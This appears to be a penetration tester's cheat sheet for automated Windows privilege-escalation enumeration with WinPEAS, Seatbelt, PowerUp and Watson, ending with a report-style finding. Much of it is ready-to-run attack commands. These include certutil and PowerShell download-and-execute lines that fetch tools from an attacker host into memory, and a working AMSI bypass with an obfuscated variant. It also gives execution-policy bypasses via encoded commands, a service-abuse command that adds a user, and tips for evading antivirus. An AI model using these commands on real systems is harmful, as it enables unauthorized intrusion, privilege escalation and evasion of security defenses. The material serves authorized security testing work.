🛡️ Methodology Checklist
- Bypass AMSI if needed before running PS-based tools
- WinPEAS:
winpeas.exe > out.txt— focus on red+yellow findings - Seatbelt user audit:
Seatbelt.exe -group=user - Seatbelt system audit:
Seatbelt.exe -group=system - PowerUp:
Invoke-AllChecks— note services and registry findings - Watson: run for missing patches leading to LPE
- Manually verify all high-confidence automated findings
- Cross-reference with manual checklist items before proceeding
🎯 Operational Context
Use when: Windows foothold obtained — run automated tools (WinPEAS, PowerUp, Seatbelt) to enumerate privilege escalation paths faster than manual checks. Think Dumber First: WinPEAS first — it covers 90% of what PowerUp and Seatbelt cover, plus more. Red output = high confidence privesc. Then PowerUp for unquoted service paths and weak registry perms specifically. Skip when: EDR will catch automated tools — run individual manual commands from Windows_PrivEsc_Enumeration instead.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
.\winPEASx64.exe | Full automated Windows PrivEsc enumeration |
.\winPEASx64.exe quiet systeminfo userinfo | WinPEAS focused on system + user info sections only |
.\SharpUp.exe audit | Focused: weak service permissions, unquoted paths, DLL hijacks |
.\Seatbelt.exe -group=all | Seatbelt: extensive host situational awareness |
.\Seatbelt.exe -group=user | Seatbelt: user-focused checks (saved creds, history, RDP) |
.\PowerUp.ps1; Invoke-AllChecks | PowerShell port of SharpUp — misconfig checks |
.\Sherlock.ps1; Find-AllVulns | Deprecated but comprehensive missing patch finder |
.\Watson.exe | Modern missing patch finder (replaces Sherlock) |
certutil -urlcache -split -f http://[LHOST]/[TOOL] C:\temp\[TOOL] | Transfer tool via certutil (usually allowed) |
IEX(New-Object Net.WebClient).DownloadString('http://[LHOST]/PowerUp.ps1') | In-memory PowerShell tool execution |
powershell -ep bypass -c "IEX(IWR http://[LHOST]/PowerUp.ps1 -UseBasicParsing)" | Bypass execution policy + download + execute |
🔬 Deep Dive & Workflow
WinPEAS — Key Output Sections
[+] SYSTEM INFO → OS/build version → patch search
[+] AV/EDR → Windows Defender status, AMSI
[+] USER INFO → whoami /priv + /groups + net user
[+] PROCESSES → non-standard SYSTEM processes
[+] SERVICES → modifiable, unquoted paths, DLL hijack candidates
[+] DLL HIJACKING → potential DLL hijack paths
[+] NETWORK → listening ports, ARP, routing
[+] CREDENTIALS → SAM, LSA secrets, vault, registry
[+] FILES → unattended, config, scripts with passwords
Color coding:
Red+Yellow = HIGH confidence finding
Red = medium confidence
Yellow = interesting info
Green = current user info
Run order: WinPEAS first (broad), SharpUp second (targeted service abuse), Seatbelt third (credential artifacts).
WinPEAS Transfer & Execution
# Option 1: certutil (most reliable, usually not blocked)
certutil -urlcache -split -f http://[LHOST]/winPEASx64.exe C:\temp\winPEASx64.exe
.\winPEASx64.exe | Out-File C:\temp\winpeas_output.txt
# Option 2: PowerShell WebClient
(New-Object System.Net.WebClient).DownloadFile('http://[LHOST]/winPEASx64.exe', 'C:\temp\winpeas.exe')
# Option 3: In-memory (no disk touch — PowerShell version only)
IEX(New-Object Net.WebClient).DownloadString('http://[LHOST]/winPEAS.ps1')
# Option 4: SMB share (if SMB allowed)
net use Z: \\[LHOST]\share /user:guest ""
Z:\winPEASx64.exeSeatbelt — Targeted Checks
# Full run
.\Seatbelt.exe -group=all -full -outputfile=C:\temp\seatbelt.txt
# User artifacts (fastest for cred hunting)
.\Seatbelt.exe -group=user
# → Chrome/Firefox saved logins, RDP saved sessions
# → PSReadLine history, recent files, MRU lists
# System checks (for privesc vectors)
.\Seatbelt.exe -group=system
# → Services, scheduled tasks, UAC level, AppLocker
# Credential checks
.\Seatbelt.exe CredEnum WindowsVault CredentialFilesPowerUp — Service Abuse Automation
# Import + run all checks
Import-Module .\PowerUp.ps1
Invoke-AllChecks
# Or targeted functions:
Get-ModifiableServiceFile # writable service binary
Get-ModifiableService # modifiable service config
Get-UnquotedService # unquoted service paths
Get-ModifiableRegistryAutoRun # writable HKLM\Run entries
Get-CachedGPPPassword # Group Policy Preferences passwords
# Auto-exploit (if found):
Invoke-ServiceAbuse -Name 'VulnSvc' -Command 'net user [USER] [PASS] /add'Watson — Missing Patches
# Check for unpatched privilege escalation vulnerabilities
.\Watson.exe
# → Based on OS version + installed patches
# → Lists CVEs with EDB links
# Cross-reference with:
wmic qfe list | findstr KB[NUMBER] # verify specific KB installedAMSI Bypass (When PowerShell Tools Are Blocked)
# Basic AMSI bypass (run before loading tool)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Or via obfuscation:
$a=[Ref].Assembly.GetType('System.Management.Automation.'+'Amsi'+'Utils')
$b=$a.GetField('amsi'+'InitFailed','NonPublic,Static')
$b.SetValue($null,$true)
# Then load tool normally
IEX(New-Object Net.WebClient).DownloadString('http://[LHOST]/PowerUp.ps1')Execution Policy Bypass
# Method 1: -ep bypass flag
powershell.exe -ep bypass -c "IEX(...)"
# Method 2: Scope override
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted
# Method 3: Bypass per-command
powershell -ExecutionPolicy Bypass -File .\script.ps1
# Method 4: Encode command
$cmd = "IEX(IWR http://[LHOST]/PowerUp.ps1)"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
$encoded = [Convert]::ToBase64String($bytes)
powershell -EncodedCommand $encoded🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| WinPEAS detected by AV | Default binary signature | Use PowerShell version via IEX from memory; or obfuscated binary from Veil |
| PowerUp.ps1 AMSI block | Script signature match | Load via obfuscated IEX; split the script across multiple download requests |
| Seatbelt times out | Too many checks | Run specific modules: Seatbelt.exe -group=user or Seatbelt.exe TokenPrivileges |
| Results too long to analyze | Terminal buffer overflow | Redirect: WinPEAS.exe > C:\Temp\pe.txt; transfer and review offline |
| No results returned | Tool crashed silently | Check: echo %ERRORLEVEL%; try running individual checks manually |
📝 Reporting Trigger
Finding Title: Automated Privilege Escalation Enumeration Identifies Exploitable Misconfiguration Impact: Automated enumeration tools rapidly identify privilege escalation vectors including unquoted service paths, weak registry permissions, and token privilege abuse, enabling escalation from standard user to SYSTEM. Root Cause: System not hardened against common Windows privilege escalation vectors. Automated tools trivially identify misconfigurations that would take hours of manual analysis. Recommendation: Run WinPEAS/PowerUp against all Windows systems in your environment during regular hardening audits. Apply CIS Windows Server Benchmark. Implement automated misconfiguration scanning in vulnerability management program.